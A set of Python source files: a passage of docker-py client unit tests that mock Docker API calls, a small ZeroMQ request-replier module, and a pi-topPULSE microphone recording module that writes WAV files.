timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_restart_container(self):
self.client.restart(fake_api.FAKE_CONTAINER_ID, timeout=2)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/restart',
params={'t': 2},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_restart_container_with_dict_instead_of_id(self):
self.client.restart({'Id': fake_api.FAKE_CONTAINER_ID}, timeout=2)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/restart',
params={'t': 2},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_container(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': False, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_container_with_dict_instead_of_id(self):
self.client.remove_container({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': False, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_link(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID, link=True)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': True, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_export(self):
self.client.export(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/export',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_export_with_dict_instead_of_id(self):
self.client.export({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/export',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_container(self):
self.client.inspect_container(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_container_undefined_id(self):
for arg in None, '', {True: True}:
with pytest.raises(docker.errors.NullResource) as excinfo:
self.client.inspect_container(arg)
self.assertEqual(
excinfo.value.args[0], 'image or container param is undefined'
)
def test_container_stats(self):
self.client.stats(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/stats',
timeout=60,
stream=True
)
def test_container_top(self):
self.client.top(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/top',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_container_top_with_psargs(self):
self.client.top(fake_api.FAKE_CONTAINER_ID, 'waux')
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/top',
params={'ps_args': 'waux'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
##################
# IMAGES TESTS #
##################
def test_pull(self):
self.client.pull('joffrey/test001')
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'images/create'
)
self.assertEqual(
args[1]['params'],
{'tag': None, 'fromImage': 'joffrey/test001'}
)
self.assertFalse(args[1]['stream'])
def test_pull_stream(self):
self.client.pull('joffrey/test001', stream=True)
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'images/create'
)
self.assertEqual(
args[1]['params'],
{'tag': None, 'fromImage': 'joffrey/test001'}
)
self.assertTrue(args[1]['stream'])
def test_commit(self):
self.client.commit(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'commit',
data='{}',
headers={'Content-Type': 'application/json'},
params={
'repo': None,
'comment': None,
'tag': None,
'container': '3cc2351ab11b',
'author': None
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_image(self):
self.client.remove_image(fake_api.FAKE_IMAGE_ID)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'images/e9aa60c60128',
params={'force': False, 'noprune': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_history(self):
self.client.history(fake_api.FAKE_IMAGE_NAME)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/test_image/history',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image(self):
self.client.import_image(
fake_api.FAKE_TARBALL_PATH,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromSrc': fake_api.FAKE_TARBALL_PATH
},
data=None,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image_from_bytes(self):
stream = (i for i in range(0, 100))
self.client.import_image(
stream,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromSrc': '-',
},
headers={
'Content-Type': 'application/tar',
},
data=stream,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image_from_image(self):
self.client.import_image(
image=fake_api.FAKE_IMAGE_NAME,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromImage': fake_api.FAKE_IMAGE_NAME
},
data=None,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_image(self):
self.client.inspect_image(fake_api.FAKE_IMAGE_NAME)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/test_image/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_image_undefined_id(self):
for arg in None, '', {True: True}:
with pytest.raises(docker.errors.NullResource) as excinfo:
self.client.inspect_image(arg)
self.assertEqual(
excinfo.value.args[0], 'image or container param is undefined'
)
def test_insert_image(self):
try:
self.client.insert(fake_api.FAKE_IMAGE_NAME,
fake_api.FAKE_URL, fake_api.FAKE_PATH)
except docker.errors.DeprecatedMethod:
self.assertTrue(
docker.utils.compare_version('1.12', self.client._version) >= 0
)
return
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/insert',
params={
'url': fake_api.FAKE_URL,
'path': fake_api.FAKE_PATH
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image(self):
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(fake_api.FAKE_IMAGE_NAME)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/push',
params={
'tag': None
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=False,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image_with_tag(self):
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(
fake_api.FAKE_IMAGE_NAME, tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/push',
params={
'tag': fake_api.FAKE_TAG_NAME,
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=False,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image_stream(self):
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(fake_api.FAKE_IMAGE_NAME, stream=True)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/push',
params={
'tag': None
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image(self):
self.client.tag(fake_api.FAKE_IMAGE_ID, fake_api.FAKE_REPO_NAME)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': None,
'repo': 'repo',
'force': 0
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image_tag(self):
self.client.tag(
fake_api.FAKE_IMAGE_ID,
fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': 'tag',
'repo': 'repo',
'force': 0
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image_force(self):
self.client.tag(
fake_api.FAKE_IMAGE_ID, fake_api.FAKE_REPO_NAME, force=True)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': None,
'repo': 'repo',
'force': 1
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_get_image(self):
self.client.get_image(fake_api.FAKE_IMAGE_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/e9aa60c60128/get',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_load_image(self):
self.client.load_image('Byte Stream....')
fake_request.assert_called_with(
'POST',
url_prefix + 'images/load',
data='Byte Stream....',
timeout=DEFAULT_TIMEOUT_SECONDS
)
#################
# BUILDER TESTS #
#################
def test_build_container(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
self.client.build(fileobj=script)
def test_build_container_pull(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
self.client.build(fileobj=script, pull=True)
def test_build_container_stream(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
self.client.build(fileobj=script, stream=True)
def test_build_container_custom_context(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
context = docker.utils.mkbuildcontext(script)
self.client.build(fileobj=context, custom_context=True)
def test_build_container_custom_context_gzip(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
context = docker.utils.mkbuildcontext(script)
gz_context = gzip.GzipFile(fileobj=context)
self.client.build(
fileobj=gz_context,
custom_context=True,
encoding="gzip"
)
def test_build_remote_with_registry_auth(self):
self.client._auth_configs = {
'https://example.com': {
'user': 'example',
'password': 'example',
'email': 'example@example.com'
}
}
self.client.build(path='https://github.com/docker-library/mongo')
def test_build_container_with_named_dockerfile(self):
self.client.build('.', dockerfile='nameddockerfile')
def test_build_container_with_container_limits(self):
self.client.build('.', container_limits={
'memory': 1024 * 1024,
'cpusetcpus': 1,
'cpushares': 1000,
'memswap': 1024 * 1024 * 8
})
def test_build_container_invalid_container_limits(self):
self.assertRaises(
docker.errors.DockerException,
lambda: self.client.build('.', container_limits={
'foo': 'bar'
})
)
###################
# VOLUMES TESTS #
###################
@base.requires_api_version('1.21')
def test_list_volumes(self):
volumes = self.client.volumes()
self.assertIn('Volumes', volumes)
self.assertEqual(len(volumes['Volumes']), 2)
args = fake_request.call_args
self.assertEqual(args[0][0], 'GET')
self.assertEqual(args[0][1], url_prefix + 'volumes')
@base.requires_api_version('1.21')
def test_create_volume(self):
name = 'perfectcherryblossom'
result = self.client.create_volume(name)
self.assertIn('Name', result)
self.assertEqual(result['Name'], name)
self.assertIn('Driver', result)
self.assertEqual(result['Driver'], 'local')
args = fake_request.call_args
self.assertEqual(args[0][0], 'POST')
self.assertEqual(args[0][1], url_prefix + 'volumes')
self.assertEqual(json.loads(args[1]['data']), {'Name': name})
@base.requires_api_version('1.21')
def test_create_volume_with_driver(self):
name = 'perfectcherryblossom'
driver_name = 'sshfs'
self.client.create_volume(name, driver=driver_name)
args = fake_request.call_args
self.assertEqual(args[0][0], 'POST')
self.assertEqual(args[0][1], url_prefix + 'volumes')
data = json.loads(args[1]['data'])
self.assertIn('Driver', data)
self.assertEqual(data['Driver'], driver_name)
@base.requires_api_version('1.21')
def test_create_volume_invalid_opts_type(self):
with pytest.raises(TypeError):
self.client.create_volume(
'perfectcherryblossom', driver_opts='hello=world'
)
with pytest.raises(TypeError):
self.client.create_volume(
'perfectcherryblossom', driver_opts=['hello=world']
)
with pytest.raises(TypeError):
self.client.create_volume(
'perfectcherryblossom', driver_opts=''
)
@base.requires_api_version('1.21')
def test_inspect_volume(self):
name = 'perfectcherryblossom'
result = self.client.inspect_volume(name)
self.assertIn('Name', result)
self.assertEqual(result['Name'], name)
self.assertIn('Driver', result)
self.assertEqual(result['Driver'], 'local')
args = fake_request.call_args
self.assertEqual(args[0][0], 'GET')
self.assertEqual(args[0][1], '{0}volumes/{1}'.format(url_prefix, name))
@base.requires_api_version('1.21')
def test_remove_volume(self):
name = 'perfectcherryblossom'
result = self.client.remove_volume(name)
self.assertTrue(result)
args = fake_request.call_args
self.assertEqual(args[0][0], 'DELETE')
self.assertEqual(args[0][1], '{0}volumes/{1}'.format(url_prefix, name))
#####################
# NETWORK TESTS #
#####################
@base.requires_api_version('1.21')
def test_create_network(self):
network_data = {
"id": 'abc12345',
"warning": "",
}
network_response = response(status_code=200, content=network_data)
post = mock.Mock(return_value=network_response)
with mock.patch('docker.Client.post', post):
result = self.client.create_network('foo')
self.assertEqual(result, network_data)
self.assertEqual(
post.call_args[0][0],
url_prefix + 'networks/create')
self.assertEqual(
json.loads(post.call_args[1]['data']),
{"name": "foo"})
self.client.create_network('foo', 'bridge')
self.assertEqual(
json.loads(post.call_args[1]['data']),
{"name": "foo", "driver": "bridge"})
@base.requires_api_version('1.21')
def test_remove_network(self):
network_id = 'abc12345'
delete = mock.Mock(return_value=response(status_code=200))
with mock.patch('docker.Client.delete', delete):
self.client.remove_network(network_id)
args = delete.call_args
self.assertEqual(args[0][0],
url_prefix + 'networks/{0}'.format(network_id))
@base.requires_api_version('1.21')
def test_inspect_network(self):
network_id = 'abc12345'
network_name = 'foo'
network_data = {
six.u('name'): network_name,
six.u('id'): network_id,
six.u('driver'): 'bridge',
six.u('containers'): {},
}
network_response = response(status_code=200, content=network_data)
get = mock.Mock(return_value=network_response)
with mock.patch('docker.Client.get', get):
result = self.client.inspect_network(network_id)
self.assertEqual(result, network_data)
args = get.call_args
self.assertEqual(args[0][0],
url_prefix + 'networks/{0}'.format(network_id))
@base.requires_api_version('1.21')
def test_connect_container_to_network(self):
network_id = 'abc12345'
container_id = 'def45678'
post = mock.Mock(return_value=response(status_code=201))
with mock.patch('docker.Client.post', post):
self.client.connect_container_to_network(
{'Id': container_id}, network_id)
self.assertEqual(
post.call_args[0][0],
url_prefix + 'networks/{0}/connect'.format(network_id))
self.assertEqual(
json.loads(post.call_args[1]['data']),
{'container': container_id})
@base.requires_api_version('1.21')
def test_disconnect_container_from_network(self):
network_id = 'abc12345'
container_id = 'def45678'
post = mock.Mock(return_value=response(status_code=201))
with mock.patch('docker.Client.post', post):
self.client.disconnect_container_from_network(
{'Id': container_id}, network_id)
self.assertEqual(
post.call_args[0][0],
url_prefix + 'networks/{0}/disconnect'.format(network_id))
self.assertEqual(
json.loads(post.call_args[1]['data']),
{'container': container_id})
#######################
# PY SPECIFIC TESTS #
#######################
def test_load_config_no_file(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
cfg = docker.auth.load_config(folder)
self.assertTrue(cfg is not None)
def test_load_config(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder, '.dockercfg')
with open(dockercfg_path, 'w') as f:
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
f.write('auth = {0}\n'.format(auth_))
f.write('email = sakuya@scarlet.net')
cfg = docker.auth.load_config(dockercfg_path)
assert docker.auth.INDEX_NAME in cfg
self.assertNotEqual(cfg[docker.auth.INDEX_NAME], None)
cfg = cfg[docker.auth.INDEX_NAME]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_load_config_with_random_name(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder,
'.{0}.dockercfg'.format(
random.randrange(100000)))
registry = 'https://your.private.registry.io'
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
config = {
registry: {
'auth': '{0}'.format(auth_),
'email': 'sakuya@scarlet.net'
}
}
with open(dockercfg_path, 'w') as f:
json.dump(config, f)
cfg = docker.auth.load_config(dockercfg_path)
assert registry in cfg
self.assertNotEqual(cfg[registry], None)
cfg = cfg[registry]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_load_config_custom_config_env(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder, 'config.json')
registry = 'https://your.private.registry.io'
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
config = {
registry: {
'auth': '{0}'.format(auth_),
'email': 'sakuya@scarlet.net'
}
}
with open(dockercfg_path, 'w') as f:
json.dump(config, f)
with mock.patch.dict(os.environ, {'DOCKER_CONFIG': folder}):
cfg = docker.auth.load_config(None)
assert registry in cfg
self.assertNotEqual(cfg[registry], None)
cfg = cfg[registry]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_tar_with_excludes(self):
dirs = [
'foo',
'foo/bar',
'bar',
]
files = [
'Dockerfile',
'Dockerfile.alt',
'.dockerignore',
'a.py',
'a.go',
'b.py',
'cde.py',
'foo/a.py',
'foo/b.py',
'foo/bar/a.py',
'bar/a.py',
]
exclude = [
'*.py',
'!b.py',
'!a.go',
'foo',
'Dockerfile*',
'.dockerignore',
]
expected_names = set([
'Dockerfile',
'.dockerignore',
'a.go',
'b.py',
'bar',
'bar/a.py',
])
base = make_tree(dirs, files)
self.addCleanup(shutil.rmtree, base)
with docker.utils.tar(base, exclude=exclude) as archive:
tar = tarfile.open(fileobj=archive)
assert sorted(tar.getnames()) == sorted(expected_names)
def test_tar_with_empty_directory(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['foo', 'bar']:
os.makedirs(os.path.join(base, d))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'foo'])
def test_tar_with_file_symlinks(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
with open(os.path.join(base, 'foo'), 'w') as f:
f.write("content")
os.makedirs(os.path.join(base, 'bar'))
os.symlink('../foo', os.path.join(base, 'bar/foo'))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'bar/foo', 'foo'])
def test_tar_with_directory_symlinks(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['foo', 'bar']:
os.makedirs(os.path.join(base, d))
os.symlink('../foo', os.path.join(base, 'bar/foo'))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'bar/foo', 'foo'])
#######################
# HOST CONFIG TESTS #
#######################
def test_create_host_config_secopt(self):
security_opt = ['apparmor:test_profile']
result = self.client.create_host_config(security_opt=security_opt)
self.assertIn('SecurityOpt', result)
self.assertEqual(result['SecurityOpt'], security_opt)
self.assertRaises(
docker.errors.DockerException, self.client.create_host_config,
security_opt='wrong'
)
class StreamTest(Cleanup, base.BaseTestCase):
def setUp(self):
socket_dir = tempfile.mkdtemp()
self.build_context = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, socket_dir)
self.addCleanup(shutil.rmtree, self.build_context)
self.socket_file = os.path.join(socket_dir, 'test_sock.sock')
self.server_socket = self._setup_socket()
self.stop_server = False
server_thread = threading.Thread(target=self.run_server)
server_thread.daemon = True
server_thread.start()
self.response = None
self.request_handler = None
self.addCleanup(server_thread.join)
self.addCleanup(self.stop)
def stop(self):
self.stop_server = True
def _setup_socket(self):
server_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.bind(self.socket_file)
# Non-blocking mode so that we can shut the test down easily
server_sock.setblocking(0)
server_sock.listen(5)
return server_sock
def run_server(self):
try:
while not self.stop_server:
try:
connection, client_address = self.server_socket.accept()
except socket.error:
# Probably no connection to accept yet
time.sleep(0.01)
continue
connection.setblocking(1)
try:
self.request_handler(connection)
finally:
connection.close()
finally:
self.server_socket.close()
def early_response_sending_handler(self, connection):
data = b''
headers = None
connection.sendall(self.response)
while not headers:
data += connection.recv(2048)
parts = data.split(b'\r\n\r\n', 1)
if len(parts) == 2:
headers, data = parts
mo = re.search(r'Content-Length: ([0-9]+)', headers.decode())
assert mo
content_length = int(mo.group(1))
while True:
if len(data) >= content_length:
break
data += connection.recv(2048)
def test_early_stream_response(self):
self.request_handler = self.early_response_sending_handler
lines = []
for i in range(0, 50):
line = str(i).encode()
lines += [('%x' % len(line)).encode(), line]
lines.append(b'0')
lines.append(b'')
self.response = (
b'HTTP/1.1 200 OK\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n'
) + b'\r\n'.join(lines)
with docker.Client(base_url="http+unix://" + self.socket_file) \
as client:
for i in range(5):
try:
stream = client.build(
path=self.build_context,
stream=True
)
break
except requests.ConnectionError as e:
if i == 4:
raise e
self.assertEqual(list(stream), [
str(i).encode() for i in range(50)])
|
repliers.py
|
import zmq
from .sockets import ServerConnection
from .constants import *
import threading
def replier(address,callback,message_type):
"""
Creates a replier that binds to the given address and sends replies.
The callback is invoked for every request received.
Args:
- address: the address to bind the REP socket to.
- callback: the callback to invoke for every request. Must accept two arguments: the message and the replier
- message_type: the type of message to receive
"""
return Replier(address,callback,message_type)
class Replier(ServerConnection):
"""
Replier that can respond to requests of the given type
Args:
- address: the address to bind to
- callback: the callback to invoke for every request
- message_type: the type of message to receive
"""
def __init__(self,address,callback,message_type):
self._active = True
self._callback = callback
self._message_type = message_type
super(Replier,self).__init__(address,zmq.REP)
def _consume(self):
while self._active:
try:
topic, message=super(Replier,self).receive(self._message_type)
#process the message
self._callback(message,self)
except zmq.ZMQError:
pass
def start(self):
"""
Start a thread that consumes the requests and invokes the callback
"""
t=threading.Thread(target=self._consume)
t.start()
def stop(self):
"""
Stop the consumer thread
"""
self._active = False
def reply(self,message,message_type):
"""
Send a reply message of the given type
Args:
- message: the reply message to send
- message_type: the type of message being sent
"""
if message_type == MULTIPART:
raise Exception("Unsupported reply type")
super(Replier,self).send(message,message_type)
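# Minimal usage sketch (not part of the original module). The message-type
# constant below is hypothetical and assumed to come from .constants;
# substitute whichever non-MULTIPART type your requestor actually sends.
#
# def handle(message, rep):
#     rep.reply(message, SOME_TYPE)  # echo the request back; SOME_TYPE is assumed
#
# r = replier("tcp://*:5555", handle, SOME_TYPE)
# r.start()   # consume requests on a background thread
# ...
# r.stop()    # stop the consumer loop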
|
microphone.py
|
import signal
from binascii import hexlify, unhexlify
from os import close, path, remove, rename, stat
from struct import pack
from sys import exit
from tempfile import mkstemp
from threading import Thread
from time import sleep
import serial
from pitop.common.logger import PTLogger
from pitop.pulse import configuration
_bitrate = 8
_continue_writing = False
_recording_thread = False
_thread_running = False
_exiting = False
_temp_file_path = ""
#######################
# INTERNAL OPERATIONS #
#######################
def __signal_handler(signum, frame):
"""INTERNAL.
Handles signals from the OS.
"""
global _exiting
if _exiting is False:
_exiting = True
if _thread_running is True:
stop()
PTLogger.info("\nQuitting...")
exit(0)
def __get_size(filename):
"""INTERNAL.
Gets the size of a file.
"""
file_stats = stat(filename)
return file_stats.st_size
def __from_hex(value):
"""INTERNAL.
Gets a bytearray from hex data.
"""
return bytearray.fromhex(value)
def __space_separated_little_endian(integer_value, byte_len):
"""INTERNAL.
Format an integer as space-separated little-endian hex bytes for the WAV file header.
"""
if byte_len <= 1:
pack_type = "<B"
elif byte_len <= 2:
pack_type = "<H"
elif byte_len <= 4:
pack_type = "<I"
elif byte_len <= 8:
pack_type = "<Q"
else:
PTLogger.info("Value cannot be represented in 8 bytes - exiting")
exit()
hex_string = pack(pack_type, integer_value)
temp = hexlify(hex_string).decode()
return " ".join([temp[i : i + 2] for i in range(0, len(temp), 2)])
def __init_header_information():
"""INTERNAL.
Create a WAV file header.
"""
RIFF = "52 49 46 46"
WAVE = "57 41 56 45"
fmt = "66 6d 74 20"
DATA = "64 61 74 61"
if configuration.microphone_sample_rate_is_22khz():
capture_sample_rate = 22050
else:
capture_sample_rate = 16000
# ChunkID
header = __from_hex(RIFF)
# ChunkSize - 4 bytes (to be changed depending on length of data...)
header += __from_hex(__space_separated_little_endian(0, 4))
# Format
header += __from_hex(WAVE)
# Subchunk1ID
header += __from_hex(fmt)
# Subchunk1Size (PCM = 16)
header += __from_hex(__space_separated_little_endian(16, 4))
# AudioFormat (PCM = 1)
header += __from_hex(__space_separated_little_endian(1, 2))
header += __from_hex(__space_separated_little_endian(1, 2)) # NumChannels
# SampleRate
header += __from_hex(__space_separated_little_endian(capture_sample_rate, 4))
bytes_per_sample = _bitrate // 8
# ByteRate (SampleRate * NumChannels * BytesPerSample; mono here)
header += __from_hex(__space_separated_little_endian(capture_sample_rate * bytes_per_sample, 4))
# BlockAlign (NumChannels * BytesPerSample)
header += __from_hex(__space_separated_little_endian(bytes_per_sample, 2))
# BitsPerSample
header += __from_hex(__space_separated_little_endian(_bitrate, 2))
# Subchunk2ID
header += __from_hex(DATA)
# Subchunk2Size - 4 bytes (to be changed depending on length of data...)
header += __from_hex(__space_separated_little_endian(0, 4))
return header
def __update_header_in_file(file, position, value):
"""INTERNAL.
Update the WAV header
"""
hex_value = __space_separated_little_endian(value, 4)
data = unhexlify("".join(hex_value.split()))
file.seek(position)
file.write(data)
def __finalise_wav_file(file_path):
"""INTERNAL.
Update the WAV file header with the size of the data.
"""
size_of_data = __get_size(file_path) - 44
if size_of_data <= 0:
PTLogger.info("Error: No data was recorded!")
remove(file_path)
else:
with open(file_path, "rb+") as file:
PTLogger.debug("Updating header information...")
__update_header_in_file(file, 4, size_of_data + 36)
__update_header_in_file(file, 40, size_of_data)
def __thread_method():
"""INTERNAL.
Thread method.
"""
__record_audio()
def __record_audio():
"""INTERNAL.
Open the serial port and capture audio data into a temp file.
"""
global _temp_file_path
temp_file_tuple = mkstemp()
close(temp_file_tuple[0])
_temp_file_path = temp_file_tuple[1]
if path.exists("/dev/serial0"):
PTLogger.debug("Opening serial device...")
serial_device = serial.Serial(
port="/dev/serial0",
timeout=1,
baudrate=250000,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
)
serial_device_open = serial_device.isOpen()
if serial_device_open is True:
try:
PTLogger.debug("Start recording")
with open(_temp_file_path, "wb") as file:
PTLogger.debug("WRITING: initial header information")
file.write(__init_header_information())
if serial_device.inWaiting():
PTLogger.debug("Flushing input and starting from scratch")
serial_device.flushInput()
PTLogger.debug("WRITING: wave data")
while _continue_writing:
while not serial_device.inWaiting():
sleep(0.01)
audio_output = serial_device.read(serial_device.inWaiting())
bytes_to_write = bytearray()
for pcm_data_block in audio_output:
if _bitrate == 16:
pcm_data_int = pcm_data_block
scaled_val = int((pcm_data_int * 32768) / 255)
bytes_to_write += __from_hex(
__space_separated_little_endian(scaled_val, 2)
)
else:
pcm_data_int = pcm_data_block
bytes_to_write += __from_hex(
__space_separated_little_endian(pcm_data_int, 1)
)
file.write(bytes_to_write)
sleep(0.1)
finally:
serial_device.close()
__finalise_wav_file(_temp_file_path)
PTLogger.debug("Finished Recording.")
else:
PTLogger.info("Error: Serial port failed to open")
else:
PTLogger.info("Error: Could not find serial port - are you sure it's enabled?")
#######################
# EXTERNAL OPERATIONS #
#######################
def record():
"""Start recording on the pi-topPULSE microphone."""
global _thread_running
global _continue_writing
global _recording_thread
if not configuration.mcu_enabled():
PTLogger.info("Error: pi-topPULSE is not initialised.")
exit()
if _thread_running is False:
_thread_running = True
_continue_writing = True
_recording_thread = Thread(group=None, target=__thread_method)
_recording_thread.start()
else:
PTLogger.info("Microphone is already recording!")
def is_recording():
"""Returns recording state of the pi-topPULSE microphone."""
return _thread_running
def stop():
"""Stops recording audio."""
global _thread_running
global _continue_writing
_continue_writing = False
_recording_thread.join()
_thread_running = False
def save(file_path, overwrite=False):
"""Saves recorded audio to a file."""
global _temp_file_path
if _thread_running is False:
if _temp_file_path != "" and path.exists(_temp_file_path):
if path.exists(file_path) is False or overwrite is True:
if path.exists(file_path):
remove(file_path)
rename(_temp_file_path, file_path)
_temp_file_path = ""
else:
PTLogger.info("File already exists")
else:
PTLogger.info("No recorded audio data found")
else:
PTLogger.info("Microphone is still recording!")
def set_sample_rate_to_16khz():
"""Set the appropriate I2C bits to enable 16,000Hz recording on the
microphone."""
